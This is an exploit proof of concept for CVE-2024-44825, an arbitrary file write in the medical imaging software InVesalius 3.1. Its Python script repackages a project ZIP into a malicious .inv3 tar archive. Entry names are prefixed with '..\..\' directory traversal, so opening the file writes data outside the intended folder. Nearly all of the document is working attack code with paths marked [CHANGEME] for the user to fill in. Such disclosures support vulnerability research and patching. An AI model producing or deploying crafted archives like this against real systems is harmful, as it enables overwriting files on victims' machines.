# Exploit Title: Invesalius 3.1 - Arbitrary File Write using Directory Traversal
# Discovered By: Riccardo Degli Esposti (partywave)
# Exploit Author: Riccardo Degli Esposti (partywave)
# Vendor Homepage: https://invesalius.github.io/
# Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius
# Version: from 3.1.99995
# Tested on: Windows
# CVE-ID: CVE-2024-44825import tarfile
import os
import zipfile
# Disclaimer:
# Tested on Windows
# edit every [CHANGEME] before run this script
# Step 0: Setup local paths
# Adapt your paths
zip_file_path = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME].zip'
extracted_folder = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME]'
output_tar = 'C:\\users\\[CHANGEME]\\downloads\\local-output.inv3'
main_plist_path = os.path.join(extracted_folder, 'main.plist')
# Ensure the extraction directory exists
os.makedirs(extracted_folder, exist_ok=True)
# Step 1: Extract the ZIP file
with zipfile.ZipFile(zip_file_path, 'r') as zip_ref:
zip_ref.extractall(extracted_folder)
with open(main_plist_path, 'r') as file:
main_plist_content = file.read()
# POC of loading new XML
main_plist_content = main_plist_content.replace(
'<string>ProMED CT 0051</string>',
'<string>This is a confirmation modifying the XML</string>'
)
with open(main_plist_path, 'w') as file:
file.write(main_plist_content)
# Step 3: Create the tar archive
# Adapt where you want write
def rename(tarinfo):
tarinfo.name = "..\\..\\[CHANGEME]\\" + tarinfo.name
return tarinfo
with tarfile.open(output_tar, "w:xz") as tar:
for root, _, files in os.walk(extracted_folder):
for file in files:
full_path = os.path.join(root, file)
arcname = os.path.relpath(full_path, extracted_folder)
tar.add(full_path, arcname=arcname, filter=rename)
output_tar